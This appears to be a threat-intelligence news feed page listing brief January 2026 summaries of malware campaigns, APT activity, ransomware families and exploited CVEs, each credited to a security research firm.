ALERTS JANUARY 2026 2025 2024 2023 2022
HOME AI
APT
BOTNET
CAMPAIGN
CRIME
CRYPTOCURRENCY
EXPLOIT
HACKING
GROUP
OPERATION
PHISHING
RANSOM
SPAM
VIRUS
VULNEREBILITY
| 2024
2025
2026 January(30)
February(48)
March(53)
April(50)
May(9)
June(0)
July(0)
August(0) SEPTEMBER(0)
October(0)
November(0)
December(0)
DATE |
NAME |
INFO |
CATEGORY |
SUBCATE |
|
30.1.26 |
Researchers at Cisco Talos recently reported UAT-8099 activity spanning late 2025 to early 2026, where the actor targeted vulnerable IIS servers in Thailand and Vietnam. |
|||
|
30.1.26 |
Recent malicious activities attributed to TA584 threat group |
Proofpoint researchers have highlighted the evolving tactics of the TA584 threat group (also tracked as Storm-0900). In 2025, TA584 expanded its global footprint, tailoring attacks to specific languages and regions while adopting "ClickFix" social engineering techniques. |
||
|
30.1.26 |
PeckBirdy is an advanced command-and-control (C&C) framework utilized by various China-aligned Advanced Persistent Threat (APT) groups. Built on JScript, PeckBirdy can run across diverse platforms ranging from web browsers and Node.js to MSHTA and .NET. |
|||
|
30.1.26 |
A Vietnamese threat actor is likely using AI to author code powering an ongoing phishing campaign delivering the PureRAT malware and other payloads. |
|||
|
30.1.26 |
AmnesiaRAT Deployment Leads to Ransomware Payload in Multi-stage Attack |
Researchers at FortiGuard Labs have detailed recently observed activity associated with a multi-stage campaign attempting to deliver a ransomware payload. The campaign, primarily targeting Russian users, is initiated through the receipt of an archive containing a malicious LNK shortcut file. |
||
|
30.1.26 |
Malicious browser extensions lead to user security compromise |
The Google Chrome Web Store is a treasure trove of useful browser extensions to help make our lives easier or more fun when navigating the web. When browsing through the store, many extensions may look tempting but hide unexpected functionality that is not apparent to users. |
||
|
30.1.26 |
ModeloRAT malware deployments among the recent activities attributed to the KongTuke threat group |
Huntress security analysts identified a series of recent activities attributed to the threat actor known as KongTuke. The attackers have been employing malicious browser extensions to generate fake security alerts, claiming the browser halted unexpectedly and urging the user to initiate a "scan" for remediation. This technique dubbed "CrashFix" intends to manufacture urgency, tricking the victims into executing malicious commands. |
||
|
30.1.26 |
AI-generated PowerShell backdoors deployed by the Konni APT group |
A new phishing campaign orchestrated by the Konni APT group has been discovered in the wild, as reported by the researchers from Checkpoint. The attackers are targeting software developers across the Asia-Pacific region. Their specific focus lies on engineering teams managing blockchain resources, with the ultimate goal of seizing cryptocurrency assets, wallet access, and credentials. |
AI |
|
|
30.1.26 |
FortiGuard Labs researchers have identified a new phishing operation distributing an updated iteration of the Remcos RAT (Remote Access Trojan). This malware grants attackers extensive control over compromised systems. The infection chain begins with a malicious email containing a Word document. |
|||
|
30.1.26 |
A new ransomware family called Osiris was used in an attack targeting a major food service franchisee operator in Southeast Asia in November 2025. |
|||
|
30.1.26 |
Operation Covert Access targeting Argentina with RAT malware distribution |
Seqrite Labs researchers have reported on a new sophisticated spear-phishing campaign targeting Argentina’s judicial sector dubbed Covert Access. The infection chain relies on targeted emails containing malicious ZIP archives. |
||
|
30.1.26 |
Resecurity researchers have uncovered a new backdoor called PDFSIDER that abuses DLL side-loading in an attempt at slipping past antivirus and EDR defenses, loading a fake cryptbase.dll alongside a legitimate app. The implant operates in memory, uses AES-256-GCM encryption for its command-and-control channel, and offers encrypted remote shell access while checking for VMs and debuggers to avoid analysis. It's being delivered via spear-phishing with a benign-looking ZIP. |
|||
|
30.1.26 |
Researchers recently reported on SolyxImmortal, a Python-based Windows infostealer built as a single “all-in-one” implant that collects credentials, documents, keystrokes, and screenshots. Per their analysis, the malware targets Chromium browsers (e.g., Chrome/Edge/Brave), pulling the master key from Local State and using Windows DPAPI + AES-GCM to decrypt saved logins, then staging loot in %TEMP% before zipping and exfiltrating it. For C2, it abuses Discord webhooks. |
|||
|
17.1.26 |
Sicarii is a novel Ransomware-as-a-Service (RaaS) operation first discovered last year. The deployed ransomware variant is capable of file encryption, data exfiltration, credential harvesting, and network reconnaissance. It specifically targets vulnerabilities in Fortinet devices within the initial attack stages, encrypts victim files using AES-GCM and appends them with the .sicarii extension afterwards. As reported by researchers from Checkpoint, a defining characteristic of the malware is an active geo-fencing mechanism that blocks execution on systems located in Israel. |
|||
|
17.1.26 |
The Acronis Threat Research Unit has detected a targeted malware campaign aimed at U.S. governmental entities. The campaign utilizes politically themed malspam with .ZIP attachments to deliver a custom C++ backdoor dubbed LotusLite. The backdoor is designed for espionage and it communicates with a hard-coded IP-based command-and-control (C2) server, enabling remote command execution, data collection/exfiltration, and establishing system persistence. |
|||
|
17.1.26 |
Multi-stage ShadowReactor Campaign Delivers Remcos through Text-based Components |
Remcos is a frequently seen Remote Access Trojan (RAT) payload. Researchers at Securonix shared details of a recently observed campaign, identified as Shadow#Reactor. In this multi-stage campaign, text-based files like VBS, PowerShell scripts, and encoded text are responsible for delivering the final Remcos payload. This involves various downloads of attacker-hosted content and the use of a LOLbin (msbuild.exe) to legitimize the malicious activity. |
||
|
17.1.26 |
deVixor is a new Android banking malware variant observed to target Iranian users in recent campaigns. As reported by researchers from Cyble, the attackers spread this malware by distributing malicious APK files via phishing websites that mimic legitimate automotive businesses. |
|||
|
17.1.26 |
VVS Stealer is a sophisticated Python-based malware used to target Discord users and exfiltrate sensitive information. As reported by the researchers from Palo Alto Unit42, once deployed the infostealer searches for encrypted Discord tokens within LevelDB directory and harvests extensive account data, including credentials, billing information, and multifactor authentication (MFA) status. |
|||
|
17.1.26 |
IT3 Tax-Themed HTML Phishing Targets South African Enterprise Users |
A phishing campaign targeting South African organizations is abusing SARS/IT3 tax certificates as a social-engineering lure. The email uses a subject styled like an internal reference string and delivers a malicious HTML attachment masquerading as a spreadsheet/tax document (e.g., Discovery TAX IT3(B)(C) _ <victim email address> xslx.htm). |
||
|
17.1.26 |
We identified an Android campaign targeting Saudi mobile users with a trojanized application masquerading as a “Free Saudi Numbers” utility, but the underlying threat is GalleryEye hosted on MediaFire. The lure is designed to attract users looking for “أرقام سعودية مجاناً” (free Saudi numbers), a highly effective theme because it aligns with common needs such as account verification, messaging registration, and “virtual number” services. |
|||
|
17.1.26 |
CVE-2025-14847 - MongoBleed vulnerability exploited in the wild |
CVE-2025-14847 is a recently disclosed high severity (CVSS score 8.7) Improper Handling of Length Parameter Inconsistency vulnerability affecting MongoDB and MongoDB Server in versions from 3.6 onward. |
||
|
17.1.26 |
A recent AsyncRAT malware campaign abuses Dropbox and Cloudflare to deliver its payload. Initiated by phishing emails with Dropbox links, the multi-stage attack continues by disguising malicious downloads using double extensions. |
|||
|
17.1.26 |
CloudSEK recently reported a MuddyWater spear-phishing wave across Middle East targets (diplomatic, maritime, finance, telecom), where spoofed lures and malicious Word docs drop a newer Rust implant they call “RustyWater.” |
|||
|
17.1.26 |
A recent report by researchers at AhnLab highlights a Guloader campaign disguised as an employee performance review. Following a successful social engineering attempt via malspam, the attached payload (a RAR file) is opened and its embedded Guloader executable is launched to begin the attack chain. |
|||
|
17.1.26 |
Astaroth banking malware leverages WhatsApp Web for distribution |
Acronis Threat Research Unit has identified a new campaign of the Brazilian banking malware Astaroth dubbed "Boto Cor-de-Rosa." This latest iteration marks a significant evolution in the malware's capabilities, specifically regarding its distribution method. Astaroth now includes a Python-based worm module capable of exploiting WhatsApp Web to spread infection. |
||
|
9.1.26 |
Cisco Talos has identified a new campaign attributed to threat actor tracked as UAT-7290. The group primarily targets critical infrastructure and telecommunications providers in South Asia, though recent activity indicates a possible expansion into Southeastern Europe. |
|||
|
9.1.26 |
A new malware distribution campaign, tracked under the name PHALT#BLYX, is targeting European hospitality firms using phishing emails that impersonate Booking.com reservation cancellation requests. As reported by Securonix, the operation employs a "ClickFix" social engineering tactic: victims who click the email link are shown a fake Windows Blue Screen of Death (BSOD) and are tricked into opening the Windows Run prompt and pasting a malicious PowerShell command to "resolve" the error. |
|||
|
9.1.26 |
CVE-2025-52691 is a recently disclosed critical (CVSS score 10.0) arbitrary file upload vulnerability affecting SmarterTools SmarterMail software, which is an email, groupware, and collaboration server designed as an alternative to enterprise collaboration solutions such as Microsoft Exchange. |
|||
|
9.1.26 |
Kimwolf botnet has been reported to have infected more than 2 million Android devices by tunneling through residential proxy networks. According to researchers from XLab the malware is a strain of the AISURU botnet family and has been active on the threat landscape since at least August 2025. The malware has the capability for various DDoS attacks, proxy forwarding, reverse shell and file management, among others. |
|||
|
4.1.26 |
Datebug APT campaign targeting governmental organizations in India |
Researchers from Cyfirma have identified a targeted cyber espionage campaign attributed to Datebug APT group (aka APT36, Transparent Tribe). The campaign utilizes a deceptive delivery mechanism involving a weaponized Windows shortcut (LNK) files concealed within a ZIP archive, masquerading as a legitimate PDF to trick victims. The infection chain is notable for its stealthy, fileless execution. |